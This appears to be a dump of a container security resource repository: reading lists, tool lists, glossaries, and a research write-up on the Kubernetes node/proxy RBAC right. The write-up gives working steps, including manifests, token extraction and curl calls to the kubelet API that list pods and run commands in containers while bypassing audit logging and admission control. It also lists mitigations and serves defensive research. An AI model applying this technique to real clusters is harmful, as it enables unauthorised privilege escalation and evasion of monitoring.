| - [CIS Benchmark for Docker](https://www.cisecurity.org/benchmark/docker) - Worth noting that this specifically relates to Docker as a stand alone container engine, some of the recommendations will not apply when it's used as part of a Kubernetes cluster. 9 | - [DISA STIG for Kubernetes](https://stigviewer.com/stig/kubernetes/2021-04-14/) - Doesn't specify the Kubernetes distribution that's covered, but from the settings, it's likely Kubeadm 10 | - [DISA STIG for Docker Enterprise](https://www.stigviewer.com/stig/docker_enterprise_2.x_linuxunix/) - Whilst it's Docker's (now Mirantis') commercial product, some of the recommendations apply generally to Docker. 11 | 12 | ## Hardening Guides 13 | 14 | - [NSA Kubernetes Hardening Guide](https://media.defense.gov/2022/Aug/29/2003066362/-1/-1/0/CTR_KUBERNETES_HARDENING_GUIDANCE_1.2_20220829.PDF) - Covers Kubernetes hardening and some general related topics like Kubernetes auditing and threat detection 15 | - [PCI recommendations for containers and container orchestration](https://docs-prv.pcisecuritystandards.org/Guidance%20Document/Containers%20and%20Container%20Orchestration%20Tools/Guidance-for-Containers-and-Container-Ochestration-Tools-v1_0.pdf?hsCtaTracking=e1f57154-dcd8-4ddc-88bc-099110ddaec7%7C5b4d5cdd-43fb-4107-92c5-cfe752cdc807) - Covers, in a non-product specific way, container and container orchestration security. Whilst it's targeted at PCI environments, most of the guidance applies to container environments in general, there's some commentary on it [here](https://raesene.github.io/blog/2022/09/10/PCI-Guidance-for-containers-and-container-orchestration-tools/) -------------------------------------------------------------------------------- /general_information/reading_list.md: -------------------------------------------------------------------------------- 1 | # Reading List 2 | 3 | This is a list of more in-depth articles than can be worth reading to get a better understanding of some of the underlying technologies used by Containers and how things like Kubernetes work. 4 | 5 | ## Container History 6 | 7 | - [Brief Container History](https://blog.aquasec.com/a-brief-history-of-containers-from-1970s-chroot-to-docker-2016) 8 | - Series of posts from 2013 on the history of container engines leading up to Docker 9 | - [part one](https://web.archive.org/web/20191011153644/http://www.cybera.ca/news-and-events/tech-radar/contain-your-enthusiasm-part-one-a-history-of-operating-system-containers/) 10 | - [part two](https://web.archive.org/web/20191011151348/https://www.cybera.ca/news-and-events/tech-radar/contain-your-enthusiasm-part-two-jails-zones-openvz-and-lxc/) 11 | - [part three](https://web.archive.org/web/20191011153243/http://www.cybera.ca/news-and-events/tech-radar/contain-your-enthusiasm-part-three-docker/ ) 12 | 13 | ## Docker Networking 14 | 15 | - [Post on Linux Bridging](https://www.thegeekstuff.com/2017/06/brctl-bridge/) 16 | - Posts on Docker MACVLAN 17 | - [part one](https://web.archive.org/web/20190217173244/https://hicu.be/docker-networking-macvlan-vlan-configuration) 18 | - [part two](https://web.archive.org/web/20190130130707/hicu.be/bridge-vs-macvlan) 19 | 20 | ## Container Storage and Volumes 21 | 22 | - [Post detailing how Docker union Filesystems and storage drivers work](https://integratedcode.us/2016/08/30/storage-drivers-in-docker-a-deep-dive/) 23 | - [Post on union file systems](https://www.terriblecode.com/blog/how-docker-images-work-union-file-systems-for-dummies/) 24 | - [Post with some opinions on the available Docker storage graphdrivers](https://blog.jessfraz.com/post/the-brutally-honest-guide-to-docker-graphdrivers/) 25 | 26 | ## Container Fundamentals 27 | 28 | ### Container Security Fundamental Series 29 | 30 | - [Exploring containers as processes](https://securitylabs.datadoghq.com/articles/container-security-fundamentals-part-1/) 31 | - [Isolation and namespaces](https://securitylabs.datadoghq.com/articles/container-security-fundamentals-part-2/) 32 | - [Capabilities](https://securitylabs.datadoghq.com/articles/container-security-fundamentals-part-3/) 33 | - [cgroups](https://securitylabs.datadoghq.com/articles/container-security-fundamentals-part-4/) 34 | 35 | 36 | - [Understanding and Hardening Linux Containers](https://research.nccgroup.com/wp-content/uploads/2020/07/ncc_group_understanding_hardening_linux_containers-1-1.pdf) - Whitepaper that goes into detail about container fundamental security. 37 | 38 | - Series of posts from Ian Lewis on Container runtimes 39 | - [part one](https://www.ianlewis.org/en/container-runtimes-part-1-introduction-container-r) 40 | - [part two](https://www.ianlewis.org/en/container-runtimes-part-2-anatomy-low-level-contai) 41 | - [part three](https://www.ianlewis.org/en/container-runtimes-part-3-high-level-runtimes) 42 | - [part four](https://www.ianlewis.org/en/container-runtimes-part-4-kubernetes-container-run) 43 | 44 | - [Start of a good series of posts on LWN about Namespaces](https://lwn.net/Articles/531114/) 45 | 46 | - Good Series of Articles on Namespaces 47 | - [part one](http://ifeanyi.co/posts/linux-namespaces-part-1/) 48 | - [part two](http://ifeanyi.co/posts/linux-namespaces-part-2/) 49 | - [part three](http://ifeanyi.co/posts/linux-namespaces-part-3/) 50 | - [part four](http://ifeanyi.co/posts/linux-namespaces-part-4/) 51 | 52 | - [Post specifically focusing on the PID namespace and it's relation to containers](https://hackernoon.com/the-curious-case-of-pid-namespaces-1ce86b6bc900) 53 | 54 | - [Post from Jessie Frazelle about non-namespaces resources in Linux](https://blog.jessfraz.com/post/two-objects-not-namespaced-linux-kernel/) 55 | 56 | - Good series of posts on capabilities from siphos 57 | - [part one](http://blog.siphos.be/2013/05/capabilities-a-short-intro/) 58 | - [part two](http://blog.siphos.be/2013/05/restricting-and-granting-capabilities/) 59 | - [part three](http://blog.siphos.be/2013/05/overview-of-linux-capabilities-part-1/) 60 | - [part four](http://blog.siphos.be/2013/05/overview-of-linux-capabilities-part-2/) 61 | - [part five](http://blog.siphos.be/2013/05/overview-of-linux-capabilities-part-3/) 62 | 63 | - [This post goes into the slightly obscure topic of "ambient capabilities"](https://s3hh.wordpress.com/2015/07/25/ambient-capabilities/) 64 | - [Post from spender of grsecurity. Talks about privesc possibilities from certain capabilities](https://forums.grsecurity.net/viewtopic.php?f=7&t=2522&sid=c6fbcf62fd5d3472562540a7e608ce4e#p10271) 65 | - [Post which isn't just on capabilities. It goes into the idea of building your own containers, and as part of that, covers capabilities](https://blog.lizzie.io/linux-containers-in-500-loc.html) 66 | - [Post about LXC and capabilities](https://blog.iwakd.de/lxc-cap_sys_admin-jessie) 67 | - [Post detailing how Docker uses cgroups](https://shekhargulati.com/2019/01/03/how-docker-uses-cgroups-to-set-resource-limits/) 68 | - [Abusing Privileged and Unprivileged Linux Containers](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2016/june/abusing-privileged-and-unprivileged-linux-containers.pdf) whitepaper on container breakout techniques, including focus on NET_RAW. 69 | - [Good post on Capabilites, seccomp and the practical use of file capabilities](https://linuxera.org/container-security-capabilities-seccomp/) 70 | 71 | ## Docker Security 72 | 73 | - [Post on Docker Authorization plugins](https://blog.aquasec.com/docker-1.10-security-features-part-2-authorization-plug-in) 74 | 75 | 76 | ## Container Registry Security 77 | 78 | - [Post about how registries can be used/abused](https://www.antitree.com/2021/10/abusing-registries-for-exfil-and-droppers/) 79 | - [ContainerDrip write-up with good details on how registries work](https://darkbit.io/blog/cve-2020-15157-containerdrip) 80 | 81 | 82 | ## Docker Swarm 83 | 84 | - [Docker Swarm Certificate management](https://docs.docker.com/engine/swarm/how-swarm-mode-works/pki/) 85 | 86 | ## runc 87 | 88 | - [Post on how to use runc directly](https://danishpraka.sh/2020/07/24/introduction-to-runc.html) 89 | 90 | ## Kubernetes - General 91 | 92 | - [Post that goes into a lot of detail of how Kubernetes works to create a deployment](https://github.com/jamiehannaford/what-happens-when-k8s) 93 | - [Post on What a Kubernetes Pod is](https://www.ianlewis.org/en/what-are-kubernetes-pods-anyway) 94 | - [Post on the pause container](https://www.ianlewis.org/en/almighty-pause-container) 95 | 96 | ## Kubernetes Networking 97 | 98 | - [Website that goes into detail on the Kubernetes networking model](https://k8s.networkop.co.uk/) 99 | 100 | - Good set of posts on Container networking setup 101 | - [part one](https://itnext.io/an-illustrated-guide-to-kubernetes-networking-part-1-d1ede3322727) 102 | - [part two](https://itnext.io/an-illustrated-guide-to-kubernetes-networking-part-2-13fdc6c4e24c) 103 | 104 | - [Post on implementing your own CNI plugin in Bash](https://www.altoros.com/blog/kubernetes-networking-writing-your-own-simple-cni-plug-in-with-bash/) 105 | 106 | - [Post on how to implement a replacement for kube-proxy](https://arthurchiao.art/blog/cracking-k8s-node-proxy/) 107 | - [Post on how Kubernetes service traffic direction is done](https://dustinspecker.com/posts/iptables-how-kubernetes-services-direct-traffic-to-pods/) 108 | 109 | ## Kubernetes Security 110 | 111 | - [Playlist of Kubernetes pentesting/security videos](https://www.youtube.com/playlist?list=PLKDRii1YwXnLmd8ngltnf9Kzvbja3DJWx) 112 | - [Post on creating reverse shells from Docker and Kubernetes](https://raesene.github.io/blog/2019/08/09/docker-reverse-shells/) 113 | - [Post on getting reverse shells on every node in a cluster](https://raesene.github.io/blog/2019/08/10/making-it-rain-shells-in-Kubernetes/) 114 | 115 | ## Attacking/Pentesting Kubernetes 116 | 117 | - [Executing code on read-only containers](https://labs.withsecure.com/publications/executing-arbitrary-code-executables-in-read-only-filesystems) 118 | 119 | 120 | ## Books 121 | 122 | ### Security Books 123 | - [Free Container Security book from Aqua](https://info.aquasec.com/container-security-book) 124 | - [Free Kubernetes Security book from Aqua](https://info.aquasec.com/kubernetes-security) 125 | - [Hacking Kubernetes](https://www.oreilly.com/library/view/hacking-kubernetes/9781492081722/) 126 | - [Cloud Native Security](https://www.amazon.co.uk/Cloud-Native-Security-Chris-Binnie-ebook/dp/B097NHC3BS) 127 | 128 | ### General Books 129 | - [Free Kubernetes Up and Running from VMWare](https://k8s.vmware.com/kubernetes-up-and-running/) 130 | - [Docker in Practice](https://www.manning.com/books/docker-in-practice-second-edition) 131 | - [Kubernetes in Action](https://www.manning.com/books/kubernetes-in-action-second-edition) 132 | -------------------------------------------------------------------------------- /general_information/support_lifecycles.md: -------------------------------------------------------------------------------- 1 | # Support Lifecycles for container software and services 2 | 3 | As this information is a bit scattered, here's some links to support lifecycle information for various projects and services in the container workld. 4 | 5 | - [containerd](https://github.com/containerd/containerd/blob/main/RELEASES.md) 6 | - [Docker](https://endoflife.date/docker-engine) 7 | - [GKE](https://endoflife.date/google-kubernetes-engine) 8 | - [EKS](https://docs.aws.amazon.com/eks/latest/userguide/kubernetes-versions.html) 9 | - [AKS](https://learn.microsoft.com/en-us/azure/aks/supported-kubernetes-versions?tabs=azure-cli#aks-kubernetes-release-calendar) 10 | - [Kubernetes](https://endoflife.date/kubernetes#:~:text=Kubernetes%20follows%20an%20N%2D2,2%20months%20of%20upgrade%20period) 11 | - [OpenShift 3](https://access.redhat.com/support/policy/updates/openshift_noncurrent) -------------------------------------------------------------------------------- /general_information/tools_list.md: -------------------------------------------------------------------------------- 1 | # Container & Kubernetes Security Tools 2 | 3 | This is a list of open source tools which help with areas related to Container security. Some of the tools in this list don't fit neatly into a specific category or categories, so they're listed with the closest option. 4 | 5 | ## Container Attack Surface Assessment & Breakout Tools 6 | 7 | Useful tools to run inside a container to assess the sandbox that's in use, and exploit some common breakout issues. 8 | 9 | * [deepce](https://github.com/stealthcopter/deepce) - Docker Enumeration, Escalation of Privileges and Container Escapes 10 | * [CDK](https://github.com/cdk-team/CDK) - Container and Kubernetes auditing and breakout tool. 11 | 12 | ## Container Vulnerability Scanning Tools 13 | 14 | * [Trivy](https://github.com/aquasecurity/trivy) - Vulnerability and IaC scanner 15 | * [Grype](https://github.com/anchore/grype) - Container vulnerability scanner 16 | * [clair](https://github.com/quay/clair) - Container vulnerability scanner 17 | * [Docker Scout](https://docs.docker.com/scout/) - Container Vulnerability scanner 18 | * [dep-scan](https://github.com/AppThreat/dep-scan) - Vulnerability and mis-configuration scanner 19 | * [Neuvector Scanner](https://github.com/neuvector/scanner) - Container Vulnerability Scanning Tool. 20 | 21 | ## IaC Scanning Tools that cover container formats 22 | 23 | * [Trivy](https://github.com/aquasecurity/trivy) - Vulnerability and IaC scanner 24 | * [Checkov](https://github.com/bridgecrewio/checkov) - IaC scanner 25 | * [KICS](https://github.com/Checkmarx/kics) - IaC scanner 26 | * [dep-scan](https://github.com/AppThreat/dep-scan) - Vulnerability and mis-configuration scanner 27 | 28 | 29 | ## Docker Security Tools 30 | 31 | * [docker bench](https://github.com/docker/docker-bench-security) - Docker CIS Benchmark assessment tool 32 | * [Dockle](https://github.com/goodwithtech/dockle) - Container Image Linter 33 | * [cnspec](https://github.com/mondoohq/cnspec) - Assessment tool for multiple platforms including Docker and Kubernetes 34 | 35 | ## Container Runtime Security Tools 36 | 37 | * [Tracee](https://github.com/aquasecurity/tracee). Container runtime security tooling 38 | * [Falco](https://github.com/falcosecurity/falco). Container runtime security tooling 39 | * [Kubearmor](https://github.com/kubearmor/KubeArmor). Container runtime security enforcement tool 40 | * [Tetragon](https://github.com/cilium/tetragon). Container runtime security tool 41 | 42 | ## Container Registry Tools 43 | 44 | * [regclient](https://github.com/regclient/regclient) - Another tool for interacting with container registries 45 | * [crane](https://github.com/google/go-containerregistry) - Tool for interacting with Container registries. 46 | * [skopeo](https://github.com/containers/skopeo) - Tool for interaction with Container registries 47 | 48 | 49 | ## Container Image Tools 50 | 51 | * [Dive](https://github.com/wagoodman/dive) - Tool for exploring Container image layers 52 | 53 | ## Kubernetes Tools 54 | 55 | ### RBAC Assessment Tools 56 | 57 | * [rbac-tool](https://github.com/alcideio/rbac-tool) - RBAC Tool for Kubernetes 58 | * [kubiScan](https://github.com/cyberark/KubiScan) - Tool to scan Kubernetes clusters for risky permissions 59 | * [krane](https://github.com/appvia/krane) - Kubernetes RBAC static analysis & visualisation tool 60 | * [eathar](https://github.com/raesene/eathar) - Kubernetes security assessment tool focusing on workload security and RBAC. 61 | 62 | ### Kubernetes Security Auditing Tools 63 | 64 | * [kube-bench](https://github.com/aquasecurity/kube-bench) - Tool to assess compliance with the CIS benchmark for various Kubernetes distributions 65 | * [kubescape](https://github.com/armosec/kubescape) - Kubernetes security assessment tool 66 | * [kubesec](https://github.com/controlplaneio/kubesec) - Kubernetes security assessment tool focusing on workload security 67 | * [kubescore](https://github.com/zegl/kube-score) - Kubernetes security and reliability assessment tool focusing on workload security. 68 | * [eathar](https://github.com/raesene/eathar) - Kubernetes security assessment tool focusing on workload security and RBAC. 69 | * [popeye](https://github.com/derailed/popeye) - Kubernetes cluster scanner, looking for possible mis-configurations. 70 | * [cnspec](https://github.com/mondoohq/cnspec) - Assessment tool for multiple platforms including Docker and Kubernetes 71 | 72 | 73 | ### Kubernetes Penetration Testing Tools 74 | 75 | * [peirates](https://github.com/inguardians/peirates) - Kubernetes container breakout tool 76 | * [teisteanas](https://github.com/raesene/teisteanas) - Tool to create kubeconfig files based on the CertificateSigningRequest API. 77 | * [tòcan](https://github.com/raesene/tocan) - Tool to create kubeconfig files based on the TokenRequest API. 78 | * [MKAT](https://github.com/DataDog/managed-kubernetes-auditing-toolkit/) - Managed Kubernetes Auditing Tool. Focuses on exploring security issues in managed Kubernetes (e.g. EKS) 79 | * [Kubehound](https://kubehound.io/) - KubeHound creates a graph of attack paths in a Kubernetes cluster 80 | * [IceKube](https://github.com/WithSecureLabs/IceKube) - Kubernetes attack path evaluation tool. 81 | * [namespacehound](https://github.com/wiz-sec-public/namespacehound/) - Tool to test a cluster for possible namespace breakouts where multi-tenancy is in use. 82 | 83 | ### Kubelet Tools 84 | 85 | * [kubeletctl](https://github.com/cyberark/kubeletctl) - This is a good tool to automate the process of assessing a kubelet instance. If the instance is vulnerable it can also carry out some exploit tasks 86 | * [kubelet dumper](https://github.com/raesene/kubelet_dumper) - PoC tool to dump Kubelet configurations for review. 87 | 88 | ### Security Observability Tools 89 | 90 | * [ThreatMapper](https://github.com/deepfence/ThreatMapper). Cloud + Container Security observability 91 | 92 | ### Training Tools 93 | 94 | If you're looking to practice with some of the tools here, in a safe environment, there are projects to help with that. 95 | 96 | * [Kube Security Lab](https://github.com/raesene/kube_security_lab) - Basic set of Kubernetes security scenarios implemented in Ansible with KinD 97 | * [Kubernetes Simulator](https://github.com/kubernetes-simulator/simulator) - AWS based Kubernetes cluster environment with different vulnerability scenarios 98 | * [Kubernetes Goat](https://github.com/madhuakula/kubernetes-goat) - Focuses on vulnerable deployments on top of an existing cluster. Also available on line [with Katacoda](https://katacoda.com/madhuakula/scenarios/kubernetes-goat) 99 | * [K8s-iam-lab](https://github.com/TremoloSecurity/k8s-idm-lab) - Kubernetes IAM Lab 100 | 101 | ### Kubernetes Honeypot projects 102 | 103 | * [Helix Honeypot](https://github.com/Zeerg/helix-honeypot) - Kubernetes API server honeypot 104 | * [Kubernetes Honeytokens](https://blog.thinkst.com/2021/11/a-kubeconfig-canarytoken.html) - A honey token Canary for use with honeypots. 105 | 106 | ### Kubernetes Security Improvement Tools 107 | 108 | * [Security Profiles Operator](https://github.com/kubernetes-sigs/security-profiles-operator) - Kubernetes operator for security profiles 109 | * [hardeneks](https://github.com/aws-samples/hardeneks) - Tool to harden EKS clusters 110 | 111 | # Deprecated/Unmaintained Tools 112 | 113 | Inevitably over time, some tools will become unmaintained and deprecated. Whilst they may still work ok, caution is needed. If I've listed you here and you're not deprecated just open an issue to move it back :) 114 | 115 | * [kube-hunter](https://github.com/aquasecurity/kube-hunter) - Tool to test and exploit standard Kubernetes Security Vulnerabilities 116 | * [kubectl-who-can](https://github.com/aquasecurity/kubectl-who-can) - Tool that lets you ask "who can" do things in RBAC, e.g. who can get secrets 117 | * [rakkess](https://github.com/corneliusweig/rakkess) - Shows the RBAC permissions available to a user as a list 118 | * [rback](https://github.com/team-soteria/rback) - tool for graphical representation of RBAC permissions in a kubernetes cluster 119 | * [amicontained](https://github.com/genuinetools/amicontained) - will show you information about the container runtime and rights you have 120 | * [ConMachi](https://github.com/nccgroup/ConMachi/) - Pentester focused container attack surface assessment tool 121 | * [botb](https://github.com/brompwnie/botb) - Container breakout assessment tool. Can automatically exploit common issues like the Docker socket mount 122 | * [keyctl-unmask](https://github.com/antitree/keyctl-unmask) - Tool that specifically focuses on grabbing kernel keyring entries from containers that allow the keyctl syscall 123 | * [go-pillage-registries](https://github.com/nccgroup/go-pillage-registries) - Tool to search the manifests and configuration for images in a registry for potentially sensitive information 124 | * [reg](https://github.com/genuinetools/reg) - Tool for interacting with Container registries 125 | * [Whaler](https://github.com/P3GLEG/Whaler) - Tool to reverse Docker images into Dockerfiles. 126 | * [RBAC Police](https://github.com/PaloAltoNetworks/rbac-police) - RBAC policy evaluation. 127 | * [kubestrike](https://github.com/vchinnipilli/kubestrike) - Security auditing tool for Kubernetes looks at Authenticated and unauthenticated scanning 128 | * [kubestroyer](https://github.com/Rolix44/Kubestroyer) - Kubernetes pentesting tool. 129 | * [kubestalk](https://github.com/redhuntlabs/kubestalk) - Black Box Kubernetes Pentesting Tool. 130 | * [kubedagger](https://github.com/yasindce1998/KubeDagger) - Kubernetes offensive framework built in eBPF. 131 | * [kubesploit](https://github.com/cyberark/kubesploit) - Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang, focused on containerized environments 132 | * [k8spot](https://github.com/Maddosaurus/k8spot) - Kubernetes honeypot. 133 | * [Terrascan](https://github.com/tenable/terrascan) - IAC Scanner for various formats including Docker and Kubernetes 134 | * [hadolint](https://github.com/hadolint/hadolint) - Docker file linter 135 | * [kubeaudit](https://github.com/Shopify/kubeaudit) - Kubernetes security assessment tool focusing on workload security 136 | * [kdigger](https://github.com/quarkslab/kdigger) - Kubernetes breakout/discovery tool 137 | * [auger](https://github.com/jpbetz/auger) - Tool for decoding information pulled directly from the etcd database 138 | -------------------------------------------------------------------------------- /images/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/raesene/container-security-site/8d7b7d3fd20f48c4c6c073256b479ff8486a86ec/images/logo.png -------------------------------------------------------------------------------- /images/under_construction.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/raesene/container-security-site/8d7b7d3fd20f48c4c6c073256b479ff8486a86ec/images/under_construction.gif -------------------------------------------------------------------------------- /jargon_busters/container_terms_for_security_people.md: -------------------------------------------------------------------------------- 1 | # Container Terms for Security People 2 | 3 | * **Container** - A container is just a running Linux process which has been isolated from the rest of the host, generally using standard Linux security measures like namespaces and cgroups. There are variants on this (like Windows containers and VM based solutions) but usually container == linux process 4 | 5 | * **Container Image** - This is a tarball, which has the application that the container will run, plus any supporting software needed to run it. Many containers use Linux packages and root filesystems for their container images, so these need patched/scannned/updated similarly to standard Linux hosts 6 | 7 | * **Container Runtime** - Usually Docker. This is essentially command execution as a service. Docker will pull down container images and then launch processes based on those images. Docker doesn't (by default) listen on the network, but can be configured to. At that point it's best thought of as "remote command execution as a service". An important point is that Docker access == root on the host, by design. 8 | 9 | * **Container Orchestrator** - Usually Kubernetes. This is a clustering system which ties together sets of host running things like Docker, and lets developers and administrators run containers across all of the hosts in the cluster. Unlike Docker, Kubernetes is a multi-user system with Role Based Acess Control. Effectively Kubernets can be thought of as "distributed remote command execution as a service" -------------------------------------------------------------------------------- /jargon_busters/security_terms_for_container_people.md: -------------------------------------------------------------------------------- 1 | # Security Terms For Container People 2 | 3 | There's quite a lot terminology which may be unfamiliar to container app developers and cluster operators. These definitions are not meant to be comprehensive (whole books have been written about some of these topics) but hopefully a useful "starter for 10". 4 | 5 | * **CVE** - Stands for "Common Vulnerabilities and Exposures". A CVE is at term used in security to typically refer to a specific security vulnerability (For example [CVE-2020-8558](https://nvd.nist.gov/vuln/detail/CVE-2020-8558) is an issue in kube-proxy). CVEs are useful as there's a centralised database of them which can be checked by tools and people who want to do track what versions of various products are vulnerable to specific issues, making things like checking "what vulnerabilities does the installed product with version x.x have"). 6 | 7 | * **CVSS** - Stands for "Common Vulnerability Scoring System". This gets used alongside the CVE database to provide severity ratings for vulnerabilities. CVSS provides formulas to approxmiate the severity of an issue, although it's important to note that these scores include subjective measures. Security tooling vendors will often use these ratings as the basis for their own severity calculations. 8 | 9 | * **Threat Model** - An important part of any security assessment is to determine what the applicable threat model is. This essentially means "who do I think is going to attack this thing, and what kind of attacks will they use". Without a good threat model it's very easy to waste money on controls you don't need and miss controls you do need. Also if you see someone making claims that something "is secure", it's obviously important to determine what it's secure from (no system is perfectly secure), so knowing the threat model that's been used is key. 10 | 11 | * **Attack Surface** - Often gets discussed alongside threat model. If threat model is "who's attacking me", Attack surface is "where can they attack me". So for example if an attacker is coming in over the Internet, every service you have listening on the Internet is part of your attack surface. If you use cloud services, then your logins for those services are also part of your attack surface. Generally speaking, from a security point of view, the bigger the attack surface, the harder it is to secure it (you have more things to look at), so security people are generally keen on reducing that attack surface, to give them a smaller list of things to focus on. -------------------------------------------------------------------------------- /robots.txt: -------------------------------------------------------------------------------- 1 | User-agent: AdsBot-Google 2 | User-agent: Amazonbot 3 | User-agent: anthropic-ai 4 | User-agent: Applebot 5 | User-agent: AwarioRssBot 6 | User-agent: AwarioSmartBot 7 | User-agent: Bytespider 8 | User-agent: CCBot 9 | User-agent: ChatGPT-User 10 | User-agent: ClaudeBot 11 | User-agent: Claude-Web 12 | User-agent: cohere-ai 13 | User-agent: DataForSeoBot 14 | User-agent: FacebookBot 15 | User-agent: Google-Extended 16 | User-agent: GPTBot 17 | User-agent: ImagesiftBot 18 | User-agent: magpie-crawler 19 | User-agent: omgili 20 | User-agent: omgilibot 21 | User-agent: peer39_crawler 22 | User-agent: peer39_crawler/1.0 23 | User-agent: PerplexityBot 24 | User-agent: YouBot 25 | Disallow: / -------------------------------------------------------------------------------- /security_research/index.md: -------------------------------------------------------------------------------- 1 | # Security Research 2 | 3 | An area to put content that doesn't fit neatly into attacker or defender. -------------------------------------------------------------------------------- /security_research/node_proxy.md: -------------------------------------------------------------------------------- 1 | # Node/Proxy in Kubernetes RBAC 2 | 3 | Some work done by [Rory McCune](https://twitter.com/raesene) and [Iain Smart](https://twitter.com/smarticu5) on a less well documented area of the Kubernetes/Kubelet API and RBAC rights 4 | 5 | ## Introduction 6 | 7 | The node/proxy right in Kubernetes RBAC allows for users with it to get access to services running on cluster nodes *via* the API server, which can have consequences for security architecture. 8 | 9 | Additionally with relation to the kubelet, this RBAC right could allow for effective privilege escalation and bypass of security controls such as Kubernetes audit logging and admission control. 10 | 11 | Depending on the cluster's threat model, care should be taken before granting this right, either explicitly or via the use of wildcards (e.g. cluster-admin). 12 | 13 | ## Using the API server Proxy 14 | 15 | Based on the [API server proxy documentation](https://kubernetes.io/docs/concepts/architecture/control-plane-node-communication/#apiserver-to-nodes-pods-and-services) we can see that it's possible to get access to other services running on cluster nodes, where they use HTTP or HTTPS. This feature can also be used to proxy to pods and services, but we're focusing on the node aspect. 16 | 17 | This could allow users to access ports which they may not be able to reach directly due to network firewalls. 18 | 19 | As an example, by using `kubectl proxy` we can show access to the kube-proxy health port on a cluster control plane node. 20 | 21 | This will start a proxy of the API server on localhost, port 8001 22 | ``` 23 | kubectl proxy 24 | Starting to serve on 127.0.0.1:8001 25 | ``` 26 | 27 | We can then curl to the API server using that and access the kube-proxy API. 28 | 29 | ``` 30 | curl http://127.0.0.1:8001/api/v1/nodes/kubeadm2nodemaster:10256/proxy/healthz 31 | {"lastUpdated": "2022-01-27 12:05:32.176657288 +0000 UTC m=+1737670.978648438","currentTime": "2022-01-27 12:05:32.176657288 +0000 UTC m=+1737670.978648438"} 32 | ``` 33 | 34 | ## Using the API server proxy for Kubelet access 35 | 36 | In general access via the node proxy is unauthenticated, however when accessing the kubelet service, this access is credentialed. This access can be used to do things that the user may not have rights to do, for example listing all pods on the node. 37 | 38 | This excerpt is truncated for brevity! 39 | ``` 40 | curl http://127.0.0.1:8001/api/v1/nodes/kubeadm2nodemaster:10250/proxy/pods 41 | {"kind":"PodList","apiVersion":"v1","metadata":{},"items":[{"metadata":{"name":"kubernetes-dashboard-78c79f97b4-bmhwj", 42 | ``` 43 | 44 | ## Node/Proxy rights to the Kubelet API service. 45 | 46 | The Kubernetes RBAC permission used here, has effectively dual-purpose. In addition to allowing access via the API server, it also provides direct access to the Kubelet API (the [kubelet documentation](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-authentication-authorization/#kubelet-authorization) covers the rights). 47 | 48 | In general the kubelet is only accessed by the API server *however* it also supports webhook authentication and in a standard kubeadm cluster this is configured to use the API server as the AuthN/AuthZ service. 49 | 50 | What this means is that a user with a valid client certificate or service account token, can authenticate to the kubelet API directly. 51 | 52 | If that account has GET and CREATE rights to the proxy sub-resource of the node object, they can effectively execute commands in every pod on that node, directly via the Kublet API *without* hitting the Kubernetes API. the GET right controls read access operations (like pod listing) and the CREATE right controls write access operations (like command execution). 53 | 54 | ## Security Architecture Considerations 55 | 56 | This architecture has a number of consequences from a security standpoint. First up any user with node/proxy rights can access node services with a source IP of the Kubernetes API server, bypassing any firewalls that may restrict access from their client location. 57 | 58 | More seriously, any user with node/proxy rights can bypass any security controls put in place at the Kubernetes API server level. This includes audit logging (the kubelet does not support audit logging) and admission control (which is API server only). 59 | 60 | ## Possible Recommendations 61 | 62 | - Ensure that only trusted service accounts and users have node/proxy rights. Note that any user with cluster-admin rights will have this as part of their rights. 63 | - Consideration should be given to firewalling the kubelet port to white-listed addresses only (typically the API server and any other service which uses direct kubelet access (e.g. prometheus)), which could mitigate the direct access, although not the access via the API server 64 | - Additional logging (e.g. CRI, verbose kubelet logs) could be useful to audit this access. 65 | 66 | 67 | ## Demonstrating direct Kubelet access with node/proxy 68 | 69 | Here's a set of manifests that can be used to demonstrate the issue. Create the three manifests in a cluster of your choosing (where you can reach the kubelet port at a network level) 70 | 71 | **ServiceAccount** 72 | ```yaml= 73 | apiVersion: v1 74 | kind: ServiceAccount 75 | metadata: 76 | creationTimestamp: "2022-01-07T11:51:27Z" 77 | name: nodeproxy 78 | namespace: default 79 | ``` 80 | 81 | **ClusterRole** 82 | ```yaml= 83 | apiVersion: rbac.authorization.k8s.io/v1 84 | kind: ClusterRole 85 | metadata: 86 | name: nodeproxy 87 | rules: 88 | - apiGroups: 89 | - "" 90 | resources: 91 | - nodes 92 | - nodes/proxy 93 | verbs: 94 | - get 95 | - create 96 | ``` 97 | 98 | **ClusterRoleBinding** 99 | ```yaml= 100 | apiVersion: rbac.authorization.k8s.io/v1 101 | kind: ClusterRoleBinding 102 | metadata: 103 | name: nodeproxybinding 104 | roleRef: 105 | apiGroup: rbac.authorization.k8s.io 106 | kind: ClusterRole 107 | name: nodeproxy 108 | subjects: 109 | - kind: ServiceAccount 110 | name: nodeproxy 111 | namespace: default 112 | ``` 113 | 114 | Then get the service account token and decode it (change the secret name below to match what got created in your cluster) 115 | 116 | ```shell= 117 | kubectl get secrets nodeproxy-token-8hg5r -o jsonpath={.data.token} | base64 -d 118 | ``` 119 | 120 | Then you can use curl with that token to get the pod listing (add the token where it says TOKEN below) 121 | 122 | ```shell= 123 | curl -k -H "Authorization: Bearer TOKEN" https://192.168.41.77:10250/pods 124 | ``` 125 | 126 | and if you want to you can execute commands in the containers with the general form below replace TOKEN with your secret value, NAMESPACE is the namespace of the pod, POD is the pod name and CONTAINER is the container name 127 | 128 | 129 | ```shell= 130 | curl -k -H "Authorization: Bearer TOKEN" -XPOST https://192.168.41.77:10250/run/NAMESPACE/POD/CONTAINER -d "cmd=whoami" 131 | ``` 132 | 133 | ## Related Issues 134 | 135 | There's another, related, issue with the pod proxy, that [Kinvolk found in 2019](https://kinvolk.io/blog/2019/02/abusing-kubernetes-api-server-proxying/). This essentially showed that you could use the API server proxy to send traffic to arbitrary IP address via the API server, by repeatedly changing a pod's IP addres. Testing this shows it still works today. --------------------------------------------------------------------------------